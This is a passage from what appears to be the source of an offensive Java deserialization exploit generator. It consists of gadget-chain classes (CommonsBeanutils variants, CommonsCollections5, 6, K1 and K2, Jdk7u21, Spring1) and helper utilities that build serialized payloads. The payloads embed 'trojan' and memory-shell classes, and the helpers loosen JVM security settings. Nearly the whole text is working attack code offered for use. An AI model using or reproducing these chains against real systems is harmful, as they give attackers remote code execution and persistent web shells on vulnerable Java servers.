attrNS1.setValues(coreDocument,"1","1","1"); 29 | 30 | ClassPool pool = ClassPool.getDefault(); 31 | pool.insertClassPath(new ClassClassPath(Class.forName("org.apache.commons.beanutils.BeanComparator"))); 32 | final CtClass ctBeanComparator = pool.get("org.apache.commons.beanutils.BeanComparator"); 33 | try { 34 | CtField ctSUID = ctBeanComparator.getDeclaredField("serialVersionUID"); 35 | ctBeanComparator.removeField(ctSUID); 36 | }catch (javassist.NotFoundException e){} 37 | ctBeanComparator.addField(CtField.make("private static final long serialVersionUID = -3490850999041592962L;", ctBeanComparator)); 38 | final Comparator beanComparator = (Comparator)ctBeanComparator.toClass(new JavassistClassLoader()).newInstance(); 39 | ctBeanComparator.defrost(); 40 | Reflections.setFieldValue(beanComparator, "comparator", new AttrCompare()); 41 | 42 | // StandardExecutorClassLoader classLoader = new StandardExecutorClassLoader("1.9.2"); 43 | // Class u = classLoader.loadClass("org.apache.commons.beanutils.BeanComparator"); 44 | // System.out.println(u.getPackage()); 45 | 46 | 47 | // Object beanComparator = u.getDeclaredConstructor(String.class, Comparator.class).newInstance(null, new AttrCompare()); 48 | 49 | // PriorityQueue queue = new PriorityQueue(2, (Comparator) beanComparator); 50 | PriorityQueue queue = new PriorityQueue(2, (Comparator) beanComparator); 51 | 52 | 53 | queue.add(attrNS1); 54 | queue.add(attrNS1); 55 | 56 | 57 | Reflections.setFieldValue(queue, "queue", new Object[] { templates, templates }); 58 | 59 | Reflections.setFieldValue(beanComparator, "property", "outputProperties"); 60 | // Reflections.setFieldValue(beanComparator, "comparator", new AttrNSImpl()); 61 | 62 | return (Queue)queue; 63 | } 64 | 65 | public static byte[] getByte(PayloadType type, String trojanType) throws Exception { 66 | Object val = getObject(type, trojanType); 67 | return Util.serialize(val); 68 | } 69 | } 70 | -------------------------------------------------------------------------------- /src/main/java/core/gadgets/CommonsBeanutilsObjectToStringComparator.java: -------------------------------------------------------------------------------- 1 | package core.gadgets; 2 | 3 | import core.enumtypes.PayloadType; 4 | import core.gadgets.utils.Gadgets; 5 | import core.gadgets.utils.Reflections; 6 | import core.utils.Util; 7 | import org.apache.commons.beanutils.BeanComparator; 8 | import org.apache.commons.lang3.compare.ObjectToStringComparator; 9 | 10 | import java.util.PriorityQueue; 11 | import java.util.Queue; 12 | 13 | 14 | public class CommonsBeanutilsObjectToStringComparator { 15 | 16 | public static Object getObject(PayloadType type, String trojanType) throws Exception { 17 | final Object templates = Gadgets.createTemplatesImpl(type, trojanType); 18 | 19 | ObjectToStringComparator stringComparator = new ObjectToStringComparator(); 20 | 21 | 22 | BeanComparator beanComparator = new BeanComparator(null, new ObjectToStringComparator()); 23 | 24 | PriorityQueue queue = new PriorityQueue(2, beanComparator); 25 | 26 | 27 | queue.add(stringComparator); 28 | queue.add(stringComparator); 29 | 30 | 31 | Reflections.setFieldValue(queue, "queue", new Object[] { templates, templates }); 32 | 33 | Reflections.setFieldValue(beanComparator, "property", "outputProperties"); 34 | 35 | return (Queue)queue; 36 | } 37 | 38 | public static byte[] getByte(PayloadType type, String trojanType) throws Exception { 39 | Object val = getObject(type, trojanType); 40 | return Util.serialize(val); 41 | } 42 | } 43 | -------------------------------------------------------------------------------- /src/main/java/core/gadgets/CommonsBeanutilsObjectToStringComparator_183.java: -------------------------------------------------------------------------------- 1 | package core.gadgets; 2 | 3 | import core.enumtypes.PayloadType; 4 | import core.gadgets.utils.Gadgets; 5 | import core.gadgets.utils.JavassistClassLoader; 6 | import core.gadgets.utils.Reflections; 7 | import core.utils.Util; 8 | import javassist.ClassClassPath; 9 | import javassist.ClassPool; 10 | import javassist.CtClass; 11 | import javassist.CtField; 12 | import org.apache.commons.lang3.compare.ObjectToStringComparator; 13 | 14 | import java.util.Comparator; 15 | import java.util.PriorityQueue; 16 | import java.util.Queue; 17 | 18 | 19 | public class CommonsBeanutilsObjectToStringComparator_183 { 20 | 21 | public static Object getObject(PayloadType type, String trojanType) throws Exception { 22 | final Object templates = Gadgets.createTemplatesImpl(type, trojanType); 23 | // StandardExecutorClassLoader classLoader = new StandardExecutorClassLoader("1.9.2"); 24 | // Class u = classLoader.loadClass("org.apache.commons.beanutils.BeanComparator"); 25 | // System.out.println(u.getPackage()); 26 | // 27 | // Object beanComparator = u.getDeclaredConstructor(String.class, Comparator.class).newInstance(null, new ObjectToStringComparator() ); 28 | 29 | ClassPool pool = ClassPool.getDefault(); 30 | pool.insertClassPath(new ClassClassPath(Class.forName("org.apache.commons.beanutils.BeanComparator"))); 31 | final CtClass ctBeanComparator = pool.get("org.apache.commons.beanutils.BeanComparator"); 32 | try { 33 | CtField ctSUID = ctBeanComparator.getDeclaredField("serialVersionUID"); 34 | ctBeanComparator.removeField(ctSUID); 35 | }catch (javassist.NotFoundException e){} 36 | ctBeanComparator.addField(CtField.make("private static final long serialVersionUID = -3490850999041592962L;", ctBeanComparator)); 37 | final Comparator beanComparator = (Comparator)ctBeanComparator.toClass(new JavassistClassLoader()).newInstance(); 38 | ctBeanComparator.defrost(); 39 | Reflections.setFieldValue(beanComparator, "comparator", new ObjectToStringComparator()); 40 | 41 | ObjectToStringComparator stringComparator = new ObjectToStringComparator(); 42 | 43 | 44 | // BeanComparator beanComparator = new BeanComparator(null, new ObjectToStringComparator()); 45 | 46 | PriorityQueue queue = new PriorityQueue(2, (Comparator) beanComparator); 47 | 48 | 49 | queue.add(stringComparator); 50 | queue.add(stringComparator); 51 | 52 | 53 | Reflections.setFieldValue(queue, "queue", new Object[] { templates, templates }); 54 | 55 | Reflections.setFieldValue(beanComparator, "property", "outputProperties"); 56 | // Reflections.setFieldValue(beanComparator, "comparator", stringComparator); 57 | 58 | return (Queue)queue; 59 | } 60 | 61 | public static byte[] getByte(PayloadType type, String trojanType) throws Exception { 62 | Object val = getObject(type, trojanType); 63 | return Util.serialize(val); 64 | } 65 | } 66 | -------------------------------------------------------------------------------- /src/main/java/core/gadgets/CommonsBeanutilsPropertySource.java: -------------------------------------------------------------------------------- 1 | package core.gadgets; 2 | 3 | import core.enumtypes.PayloadType; 4 | import core.gadgets.utils.Gadgets; 5 | import core.gadgets.utils.Reflections; 6 | import core.utils.Util; 7 | import org.apache.commons.beanutils.BeanComparator; 8 | import org.apache.logging.log4j.util.PropertySource; 9 | 10 | import java.util.PriorityQueue; 11 | import java.util.Queue; 12 | 13 | public class CommonsBeanutilsPropertySource{ 14 | 15 | public static Object getObject(PayloadType type, String trojanType) throws Exception { 16 | final Object templates = Gadgets.createTemplatesImpl(type, trojanType); 17 | PropertySource propertySource1 = new PropertySource() { 18 | @Override 19 | public int getPriority() { 20 | return 0; 21 | } 22 | 23 | }; 24 | 25 | BeanComparator beanComparator = new BeanComparator(null, new PropertySource.Comparator()); 26 | 27 | PriorityQueue queue = new PriorityQueue(2, beanComparator); 28 | 29 | queue.add(propertySource1); 30 | queue.add(propertySource1); 31 | 32 | 33 | Reflections.setFieldValue(queue, "queue", new Object[] { templates, templates}); 34 | 35 | Reflections.setFieldValue(beanComparator, "property", "outputProperties"); 36 | 37 | return (Queue)queue; 38 | } 39 | public static byte[] getByte(PayloadType type, String trojanType) throws Exception { 40 | Object val = getObject(type, trojanType); 41 | return Util.serialize(val); 42 | } 43 | } 44 | -------------------------------------------------------------------------------- /src/main/java/core/gadgets/CommonsBeanutilsPropertySource_183.java: -------------------------------------------------------------------------------- 1 | package core.gadgets; 2 | 3 | import core.enumtypes.PayloadType; 4 | import core.gadgets.utils.Gadgets; 5 | import core.gadgets.utils.JavassistClassLoader; 6 | import core.gadgets.utils.Reflections; 7 | import core.utils.Util; 8 | import javassist.ClassClassPath; 9 | import javassist.ClassPool; 10 | import javassist.CtClass; 11 | import javassist.CtField; 12 | import org.apache.logging.log4j.util.PropertySource; 13 | 14 | import java.util.Comparator; 15 | import java.util.PriorityQueue; 16 | import java.util.Queue; 17 | 18 | 19 | public class CommonsBeanutilsPropertySource_183{ 20 | 21 | public static Object getObject(PayloadType type, String trojanType) throws Exception { 22 | final Object templates = Gadgets.createTemplatesImpl(type, trojanType); 23 | PropertySource propertySource1 = new PropertySource() { 24 | @Override 25 | public int getPriority() { 26 | return 0; 27 | } 28 | 29 | }; 30 | 31 | // BeanComparator beanComparator = new BeanComparator(null, new PropertySource.Comparator()); 32 | // StandardExecutorClassLoader classLoader = new StandardExecutorClassLoader("1.9.2"); 33 | // Class u = classLoader.loadClass("org.apache.commons.beanutils.BeanComparator"); 34 | // System.out.println(u.getPackage()); 35 | // 36 | //// BeanComparator beanComparator = new BeanComparator(null, new AttrCompare()); 37 | // Object beanComparator = u.getDeclaredConstructor(String.class, Comparator.class).newInstance(null, new PropertySource.Comparator()); 38 | ClassPool pool = ClassPool.getDefault(); 39 | pool.insertClassPath(new ClassClassPath(Class.forName("org.apache.commons.beanutils.BeanComparator"))); 40 | final CtClass ctBeanComparator = pool.get("org.apache.commons.beanutils.BeanComparator"); 41 | try { 42 | CtField ctSUID = ctBeanComparator.getDeclaredField("serialVersionUID"); 43 | ctBeanComparator.removeField(ctSUID); 44 | }catch (javassist.NotFoundException e){} 45 | ctBeanComparator.addField(CtField.make("private static final long serialVersionUID = -3490850999041592962L;", ctBeanComparator)); 46 | final Comparator beanComparator = (Comparator)ctBeanComparator.toClass(new JavassistClassLoader()).newInstance(); 47 | ctBeanComparator.defrost(); 48 | Reflections.setFieldValue(beanComparator, "comparator", new PropertySource.Comparator()); 49 | 50 | 51 | 52 | PriorityQueue queue = new PriorityQueue(2, (Comparator) beanComparator); 53 | 54 | queue.add(propertySource1); 55 | queue.add(propertySource1); 56 | 57 | 58 | Reflections.setFieldValue(queue, "queue", new Object[] { templates, templates }); 59 | 60 | Reflections.setFieldValue(beanComparator, "property", "outputProperties"); 61 | // Reflections.setFieldValue(beanComparator, "comparator", new PropertySource.Comparator()); 62 | 63 | return (Queue)queue; 64 | } 65 | 66 | public static byte[] getByte(PayloadType type, String trojanType) throws Exception { 67 | Object val = getObject(type, trojanType); 68 | return Util.serialize(val); 69 | } 70 | } 71 | -------------------------------------------------------------------------------- /src/main/java/core/gadgets/CommonsBeanutilsString.java: -------------------------------------------------------------------------------- 1 | package core.gadgets; 2 | 3 | import core.enumtypes.PayloadType; 4 | import core.gadgets.utils.Gadgets; 5 | import core.gadgets.utils.Reflections; 6 | import core.utils.Util; 7 | import org.apache.commons.beanutils.BeanComparator; 8 | 9 | import java.util.Comparator; 10 | import java.util.PriorityQueue; 11 | import java.util.Queue; 12 | 13 | 14 | public class CommonsBeanutilsString { 15 | public static Object getObject(PayloadType type, String trojanType) throws Exception { 16 | final Object templates = Gadgets.createTemplatesImpl(type, trojanType); 17 | BeanComparator beanComparator = new BeanComparator(null, String.CASE_INSENSITIVE_ORDER); 18 | 19 | PriorityQueue queue = new PriorityQueue(2, (Comparator)beanComparator); 20 | 21 | queue.add("1"); 22 | queue.add("1"); 23 | 24 | Reflections.setFieldValue(queue, "queue", new Object[] { templates, templates }); 25 | 26 | Reflections.setFieldValue(beanComparator, "property", "outputProperties"); 27 | 28 | return (Queue)queue; 29 | } 30 | 31 | public static byte[] getByte(PayloadType type, String trojanType) throws Exception { 32 | Object val = getObject(type, trojanType); 33 | return Util.serialize(val); 34 | } 35 | } 36 | 37 | 38 | 39 | -------------------------------------------------------------------------------- /src/main/java/core/gadgets/CommonsBeanutilsString_183.java: -------------------------------------------------------------------------------- 1 | package core.gadgets; 2 | 3 | import core.enumtypes.PayloadType; 4 | import core.gadgets.utils.Gadgets; 5 | import core.gadgets.utils.JavassistClassLoader; 6 | import core.gadgets.utils.Reflections; 7 | import core.utils.Util; 8 | import javassist.ClassClassPath; 9 | import javassist.ClassPool; 10 | import javassist.CtClass; 11 | import javassist.CtField; 12 | 13 | import java.util.Comparator; 14 | import java.util.PriorityQueue; 15 | import java.util.Queue; 16 | 17 | public class CommonsBeanutilsString_183 { 18 | public static Object getObject(PayloadType type, String trojanType) throws Exception { 19 | final Object templates = Gadgets.createTemplatesImpl(type, trojanType); 20 | 21 | // StandardExecutorClassLoader classLoader = new StandardExecutorClassLoader("1.9.2"); 22 | // Class u = classLoader.loadClass("org.apache.commons.beanutils.BeanComparator"); 23 | // System.out.println(u.getPackage()); 24 | ClassPool pool = ClassPool.getDefault(); 25 | pool.insertClassPath(new ClassClassPath(Class.forName("org.apache.commons.beanutils.BeanComparator"))); 26 | final CtClass ctBeanComparator = pool.get("org.apache.commons.beanutils.BeanComparator"); 27 | try { 28 | CtField ctSUID = ctBeanComparator.getDeclaredField("serialVersionUID"); 29 | ctBeanComparator.removeField(ctSUID); 30 | }catch (javassist.NotFoundException e){} 31 | ctBeanComparator.addField(CtField.make("private static final long serialVersionUID = -3490850999041592962L;", ctBeanComparator)); 32 | final Comparator beanComparator = (Comparator)ctBeanComparator.toClass(new JavassistClassLoader()).newInstance(); 33 | ctBeanComparator.defrost(); 34 | Reflections.setFieldValue(beanComparator, "comparator", String.CASE_INSENSITIVE_ORDER); 35 | 36 | // UrlClassLoaderUtils urlClassLoaderUtils = new UrlClassLoaderUtils(); 37 | // Class u = urlClassLoaderUtils.loadJar("").loadClass("org.apache.commons.beanutils.BeanComparator"); 38 | 39 | // Object beanComparator = u.getDeclaredConstructor(String.class,Comparator.class).newInstance(null, String.CASE_INSENSITIVE_ORDER); 40 | 41 | 42 | 43 | PriorityQueue queue = new PriorityQueue(2, (Comparator)beanComparator); 44 | 45 | queue.add("1"); 46 | queue.add("1"); 47 | 48 | Reflections.setFieldValue(queue, "queue", new Object[] { templates, templates }); 49 | 50 | Reflections.setFieldValue(beanComparator, "property", "outputProperties"); 51 | // Reflections.setFieldValue(beanComparator, "comparator", String.CASE_INSENSITIVE_ORDER); 52 | 53 | return (Queue)queue; 54 | } 55 | 56 | public static byte[] getByte(PayloadType type, String trojanType) throws Exception { 57 | Object val = getObject(type, trojanType); 58 | return Util.serialize(val); 59 | } 60 | } 61 | 62 | 63 | 64 | -------------------------------------------------------------------------------- /src/main/java/core/gadgets/CommonsBeanutilsString_192s.java: -------------------------------------------------------------------------------- 1 | package core.gadgets; 2 | 3 | import core.enumtypes.PayloadType; 4 | import core.gadgets.utils.Gadgets; 5 | import core.gadgets.utils.JavassistClassLoader; 6 | import core.gadgets.utils.Reflections; 7 | import core.utils.Util; 8 | import javassist.ClassClassPath; 9 | import javassist.ClassPool; 10 | import javassist.CtClass; 11 | import javassist.CtField; 12 | 13 | import java.util.Comparator; 14 | import java.util.PriorityQueue; 15 | import java.util.Queue; 16 | 17 | public class CommonsBeanutilsString_192s { 18 | public static Object getObject(PayloadType type, String trojanType) throws Exception { 19 | final Object templates = Gadgets.createTemplatesImpl(type, trojanType); 20 | ClassPool pool = ClassPool.getDefault(); 21 | pool.insertClassPath(new ClassClassPath(Class.forName("org.apache.commons.beanutils.BeanComparator"))); 22 | final CtClass beanComparator = pool.get("org.apache.commons.beanutils.BeanComparator"); 23 | 24 | try { 25 | CtField ctSUID = beanComparator.getDeclaredField("serialVersionUID"); 26 | beanComparator.removeField(ctSUID); 27 | }catch (javassist.NotFoundException e){} 28 | beanComparator.addField(CtField.make("private static final long serialVersionUID = -3490850999041592962L;", beanComparator)); 29 | // mock method name until armed 30 | final Comparator comparator = (Comparator)beanComparator.toClass(new JavassistClassLoader()).newInstance(); 31 | beanComparator.defrost(); 32 | 33 | PriorityQueue queue = new PriorityQueue(2, (Comparator)comparator); 34 | 35 | queue.add("1"); 36 | queue.add("1"); 37 | 38 | Reflections.setFieldValue(queue, "queue", new Object[] { templates, templates }); 39 | 40 | Reflections.setFieldValue(beanComparator, "property", "outputProperties"); 41 | 42 | return queue; 43 | } 44 | 45 | public static byte[] getByte(PayloadType type, String trojanType) throws Exception { 46 | Object val = getObject(type, trojanType); 47 | return Util.serialize(val); 48 | } 49 | } 50 | 51 | 52 | 53 | -------------------------------------------------------------------------------- /src/main/java/core/gadgets/CommonsCollections5.java: -------------------------------------------------------------------------------- 1 | package core.gadgets; 2 | 3 | import core.enumtypes.PayloadType; 4 | import core.gadgets.utils.Gadgets; 5 | import core.gadgets.utils.Reflections; 6 | import core.memshell.CommandMemShell; 7 | import core.memshell.JBossListenerMemShell; 8 | 9 | import core.utils.Util; 10 | import org.apache.commons.collections.Transformer; 11 | import org.apache.commons.collections.functors.ChainedTransformer; 12 | import org.apache.commons.collections.functors.ConstantTransformer; 13 | import org.apache.commons.collections.functors.InvokerTransformer; 14 | import org.apache.commons.collections.keyvalue.TiedMapEntry; 15 | import org.apache.commons.collections.map.LazyMap; 16 | 17 | import javax.management.BadAttributeValueExpException; 18 | import java.lang.reflect.Field; 19 | import java.util.HashMap; 20 | import java.util.Map; 21 | 22 | 23 | public class CommonsCollections5 { 24 | 25 | public static Object getObject(PayloadType type, String trojanType) throws Exception { 26 | Transformer[] transformers = Gadgets.createTransformers(type, trojanType); 27 | Transformer transformerChain = new ChainedTransformer(transformers); 28 | final Map innerMap = new HashMap(); 29 | 30 | final Map lazyMap = LazyMap.decorate(innerMap, transformerChain); 31 | 32 | TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo"); 33 | 34 | BadAttributeValueExpException val = new BadAttributeValueExpException(null); 35 | Field valfield = val.getClass().getDeclaredField("val"); 36 | Reflections.setAccessible(valfield); 37 | valfield.set(val, entry); 38 | 39 | Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain 40 | 41 | return val; 42 | } 43 | 44 | public static byte[] getByte(PayloadType type, String trojanType) throws Exception { 45 | Object val = getObject(type, trojanType); 46 | return Util.serialize(val); 47 | } 48 | 49 | } 50 | -------------------------------------------------------------------------------- /src/main/java/core/gadgets/CommonsCollections6.java: -------------------------------------------------------------------------------- 1 | package core.gadgets; 2 | 3 | import core.enumtypes.PayloadType; 4 | import core.gadgets.utils.Gadgets; 5 | import core.gadgets.utils.Reflections; 6 | import core.utils.Util; 7 | import org.apache.commons.collections.Transformer; 8 | import org.apache.commons.collections.functors.ChainedTransformer; 9 | import org.apache.commons.collections.keyvalue.TiedMapEntry; 10 | import org.apache.commons.collections.map.LazyMap; 11 | 12 | import java.lang.reflect.Field; 13 | import java.util.HashMap; 14 | import java.util.HashSet; 15 | import java.util.Map; 16 | 17 | 18 | public class CommonsCollections6 { 19 | 20 | public static Object getObject(PayloadType type, String trojanType) throws Exception{ 21 | Transformer[] transformers = Gadgets.createTransformers(type, trojanType); 22 | Transformer transformerChain = new ChainedTransformer(transformers); 23 | 24 | final Map innerMap = new HashMap(); 25 | 26 | final Map lazyMap = LazyMap.decorate(innerMap, transformerChain); 27 | 28 | TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo"); 29 | 30 | HashSet map = new HashSet(1); 31 | map.add("foo"); 32 | Field f = null; 33 | try { 34 | f = HashSet.class.getDeclaredField("map"); 35 | } catch (NoSuchFieldException e) { 36 | f = HashSet.class.getDeclaredField("backingMap"); 37 | } 38 | 39 | Reflections.setAccessible(f); 40 | HashMap innimpl = (HashMap) f.get(map); 41 | 42 | Field f2 = null; 43 | try { 44 | f2 = HashMap.class.getDeclaredField("table"); 45 | } catch (NoSuchFieldException e) { 46 | f2 = HashMap.class.getDeclaredField("elementData"); 47 | } 48 | 49 | Reflections.setAccessible(f2); 50 | Object[] array = (Object[]) f2.get(innimpl); 51 | 52 | Object node = array[0]; 53 | if(node == null){ 54 | node = array[1]; 55 | } 56 | 57 | Field keyField = null; 58 | try{ 59 | keyField = node.getClass().getDeclaredField("key"); 60 | }catch(Exception e){ 61 | keyField = Class.forName("java.util.MapEntry").getDeclaredField("key"); 62 | } 63 | 64 | Reflections.setAccessible(keyField); 65 | keyField.set(node, entry); 66 | 67 | return map; 68 | 69 | } 70 | 71 | public static byte[] getByte(PayloadType type, String trojanType) throws Exception { 72 | Object map = getObject(type, trojanType); 73 | return Util.serialize(map); 74 | } 75 | 76 | } 77 | -------------------------------------------------------------------------------- /src/main/java/core/gadgets/CommonsCollectionsK1.java: -------------------------------------------------------------------------------- 1 | package core.gadgets; 2 | 3 | 4 | import core.utils.Util; 5 | import org.apache.commons.collections.functors.InvokerTransformer; 6 | import org.apache.commons.collections.keyvalue.TiedMapEntry; 7 | import org.apache.commons.collections.map.LazyMap; 8 | 9 | import java.util.HashMap; 10 | import java.util.Map; 11 | 12 | import core.enumtypes.PayloadType; 13 | import core.gadgets.utils.Gadgets; 14 | import core.gadgets.utils.Reflections; 15 | 16 | public class CommonsCollectionsK1 { 17 | 18 | 19 | public static Object getObject(PayloadType type, String trojanType) throws Exception { 20 | Object tpl = Gadgets.createTemplatesImpl(type, trojanType); 21 | 22 | InvokerTransformer transformer = new InvokerTransformer("toString", new Class[0], new Object[0]); 23 | HashMap innerMap = new HashMap(); 24 | Map m = LazyMap.decorate(innerMap, transformer); 25 | 26 | Map outerMap = new HashMap(); 27 | TiedMapEntry tied = new TiedMapEntry(m, tpl); 28 | outerMap.put(tied, "t"); 29 | // clear the inner map data, this is important 30 | innerMap.clear(); 31 | 32 | Reflections.setFieldValue(transformer, "iMethodName", "newTransformer"); 33 | 34 | return outerMap; 35 | } 36 | 37 | public static byte[] getByte(PayloadType type, String trojanType) throws Exception { 38 | Object outerMap = getObject(type, trojanType); 39 | return Util.serialize(outerMap); 40 | } 41 | } 42 | -------------------------------------------------------------------------------- /src/main/java/core/gadgets/CommonsCollectionsK2.java: -------------------------------------------------------------------------------- 1 | package core.gadgets; 2 | 3 | 4 | import core.utils.Util; 5 | import org.apache.commons.collections4.functors.InvokerTransformer; 6 | import org.apache.commons.collections4.keyvalue.TiedMapEntry; 7 | import org.apache.commons.collections4.map.LazyMap; 8 | 9 | import java.util.HashMap; 10 | import java.util.Map; 11 | 12 | import core.enumtypes.PayloadType; 13 | import core.gadgets.utils.Gadgets; 14 | import core.gadgets.utils.Reflections; 15 | 16 | public class CommonsCollectionsK2 { 17 | 18 | 19 | public static Object getObject(PayloadType type, String trojanType) throws Exception { 20 | Object tpl = Gadgets.createTemplatesImpl(type, trojanType); 21 | InvokerTransformer transformer = new InvokerTransformer("toString", new Class[0], new Object[0]); 22 | 23 | HashMap innerMap = new HashMap(); 24 | Map m = LazyMap.lazyMap(innerMap, transformer); 25 | 26 | Map outerMap = new HashMap(); 27 | TiedMapEntry tied = new TiedMapEntry(m, tpl); 28 | outerMap.put(tied, "t"); 29 | // clear the inner map data, this is important 30 | innerMap.clear(); 31 | 32 | Reflections.setFieldValue(transformer, "iMethodName", "newTransformer"); 33 | return innerMap; 34 | 35 | } 36 | 37 | public static byte[] getByte(PayloadType type, String trojanType) throws Exception { 38 | Object innerMap = getObject(type, trojanType); 39 | return Util.serialize(innerMap); 40 | } 41 | } 42 | -------------------------------------------------------------------------------- /src/main/java/core/gadgets/Jdk7u21.java: -------------------------------------------------------------------------------- 1 | package core.gadgets; 2 | 3 | import core.enumtypes.PayloadType; 4 | import core.gadgets.utils.Gadgets; 5 | import core.gadgets.utils.Reflections; 6 | import core.utils.Util; 7 | 8 | import javax.xml.transform.Templates; 9 | import java.lang.reflect.InvocationHandler; 10 | import java.util.HashMap; 11 | import java.util.LinkedHashSet; 12 | 13 | 14 | public class Jdk7u21 { 15 | 16 | public static Object getObject(PayloadType type, String trojanType) throws Exception { 17 | final Object templates = Gadgets.createTemplatesImpl(type, trojanType); 18 | 19 | String zeroHashCodeStr = "f5a5a608"; 20 | 21 | HashMap map = new HashMap(); 22 | map.put(zeroHashCodeStr, "foo"); 23 | 24 | InvocationHandler tempHandler = (InvocationHandler) Reflections.getFirstCtor(Gadgets.ANN_INV_HANDLER_CLASS).newInstance(Override.class, map); 25 | Reflections.setFieldValue(tempHandler, "type", Templates.class); 26 | Templates proxy = Gadgets.createProxy(tempHandler, Templates.class); 27 | 28 | LinkedHashSet set = new LinkedHashSet(); // maintain order 29 | set.add(templates); 30 | set.add(proxy); 31 | 32 | Reflections.setFieldValue(templates, "_auxClasses", null); 33 | Reflections.setFieldValue(templates, "_class", null); 34 | 35 | map.put(zeroHashCodeStr, templates); // swap in real object 36 | 37 | return set; 38 | } 39 | 40 | public static byte[] getByte(PayloadType type, String trojanType) throws Exception { 41 | Object set = getObject(type, trojanType); 42 | return Util.serialize(set); 43 | } 44 | 45 | 46 | } 47 | -------------------------------------------------------------------------------- /src/main/java/core/gadgets/Spring1.java: -------------------------------------------------------------------------------- 1 | package core.gadgets; 2 | 3 | import core.enumtypes.PayloadType; 4 | import core.gadgets.utils.Gadgets; 5 | import core.gadgets.utils.Reflections; 6 | import core.utils.Util; 7 | import org.springframework.beans.factory.ObjectFactory; 8 | 9 | import javax.xml.transform.Templates; 10 | import java.lang.reflect.Constructor; 11 | import java.lang.reflect.InvocationHandler; 12 | import java.lang.reflect.Type; 13 | 14 | import static java.lang.Class.forName; 15 | 16 | public class Spring1 { 17 | 18 | public static Object getObject(PayloadType type, String trojanType) throws Exception { 19 | final Object templates = Gadgets.createTemplatesImpl(type, trojanType); 20 | 21 | final ObjectFactory objectFactoryProxy = 22 | Gadgets.createMemoitizedProxy(Gadgets.createMap("getObject", templates), ObjectFactory.class); 23 | 24 | final Type typeTemplatesProxy = Gadgets.createProxy((InvocationHandler) 25 | Reflections.getFirstCtor("org.springframework.beans.factory.support.AutowireUtils$ObjectFactoryDelegatingInvocationHandler") 26 | .newInstance(objectFactoryProxy), Type.class, Templates.class); 27 | 28 | final Object typeProviderProxy = Gadgets.createMemoitizedProxy( 29 | Gadgets.createMap("getType", typeTemplatesProxy), 30 | forName("org.springframework.core.SerializableTypeWrapper$TypeProvider")); 31 | 32 | final Constructor mitpCtor = Reflections.getFirstCtor("org.springframework.core.SerializableTypeWrapper$MethodInvokeTypeProvider"); 33 | final Object mitp = mitpCtor.newInstance(typeProviderProxy, Object.class.getMethod("getClass", new Class[] {}), 0); 34 | Reflections.setFieldValue(mitp, "methodName", "newTransformer"); 35 | 36 | return mitp; 37 | } 38 | 39 | public static byte[] getByte(PayloadType type, String trojanType) throws Exception { 40 | Object mitp = getObject(type, trojanType); 41 | return Util.serialize(mitp); 42 | } 43 | } 44 | -------------------------------------------------------------------------------- /src/main/java/core/gadgets/utils/ClassFiles.java: -------------------------------------------------------------------------------- 1 | package core.gadgets.utils; 2 | 3 | import java.io.ByteArrayOutputStream; 4 | import java.io.IOException; 5 | import java.io.InputStream; 6 | 7 | public class ClassFiles { 8 | public static String classAsFile(final Class clazz) { 9 | return classAsFile(clazz, true); 10 | } 11 | 12 | public static String classAsFile(final Class clazz, boolean suffix) { 13 | String str; 14 | if (clazz.getEnclosingClass() == null) { 15 | str = clazz.getName().replace(".", "/"); 16 | } else { 17 | str = classAsFile(clazz.getEnclosingClass(), false) + "$" + clazz.getSimpleName(); 18 | } 19 | if (suffix) { 20 | str += ".class"; 21 | } 22 | return str; 23 | } 24 | 25 | public static byte[] classAsBytes(final Class clazz) { 26 | try { 27 | final byte[] buffer = new byte[1024]; 28 | final String file = classAsFile(clazz); 29 | final InputStream in = ClassFiles.class.getClassLoader().getResourceAsStream(file); 30 | if (in == null) { 31 | throw new IOException("couldn't find '" + file + "'"); 32 | } 33 | final ByteArrayOutputStream out = new ByteArrayOutputStream(); 34 | int len; 35 | while ((len = in.read(buffer)) != -1) { 36 | out.write(buffer, 0, len); 37 | } 38 | return out.toByteArray(); 39 | } catch (IOException e) { 40 | throw new RuntimeException(e); 41 | } 42 | } 43 | 44 | } 45 | -------------------------------------------------------------------------------- /src/main/java/core/gadgets/utils/Gadgets.java: -------------------------------------------------------------------------------- 1 | package core.gadgets.utils; 2 | 3 | 4 | import com.sun.org.apache.xalan.internal.xsltc.DOM; 5 | import com.sun.org.apache.xalan.internal.xsltc.TransletException; 6 | import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet; 7 | import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; 8 | import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; 9 | import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator; 10 | import com.sun.org.apache.xml.internal.serializer.SerializationHandler; 11 | 12 | import static com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl.DESERIALIZE_TRANSLET; 13 | import static core.gadgets.utils.Util.TemplateImplClassBytes; 14 | 15 | import java.io.Serializable; 16 | import java.lang.reflect.*; 17 | import java.util.HashMap; 18 | import java.util.Map; 19 | 20 | import config.Config; 21 | import core.enumtypes.PayloadType; 22 | import core.memshell.*; 23 | import javassist.ClassPool; 24 | import javassist.CtClass; 25 | import org.apache.commons.collections.Transformer; 26 | import org.apache.commons.collections.functors.ConstantTransformer; 27 | import org.apache.commons.collections.functors.InvokerTransformer; 28 | import utils.Util; 29 | 30 | 31 | 32 | /* 33 | * utility generator functions for common jdk-only gadgets 34 | */ 35 | @SuppressWarnings({ 36 | "restriction", "rawtypes", "unchecked" 37 | }) 38 | public class Gadgets { 39 | 40 | static { 41 | // special case for using TemplatesImpl gadgets with a SecurityManager enabled 42 | System.setProperty(DESERIALIZE_TRANSLET, "true"); 43 | 44 | // for RMI remote loading 45 | System.setProperty("java.rmi.server.useCodebaseOnly", "false"); 46 | } 47 | 48 | public static final String ANN_INV_HANDLER_CLASS = "sun.reflect.annotation.AnnotationInvocationHandler"; 49 | 50 | public static class StubTransletPayload extends AbstractTranslet implements Serializable { 51 | 52 | private static final long serialVersionUID = -5971610431559700674L; 53 | 54 | 55 | public void transform(DOM document, SerializationHandler[] handlers) throws TransletException { 56 | } 57 | 58 | 59 | @Override 60 | public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException { 61 | } 62 | } 63 | 64 | // required to make TemplatesImpl happy 65 | public static class Foo implements Serializable { 66 | 67 | private static final long serialVersionUID = 8207363842866235160L; 68 | } 69 | 70 | 71 | public static T createMemoitizedProxy(final Map map, final Class iface, 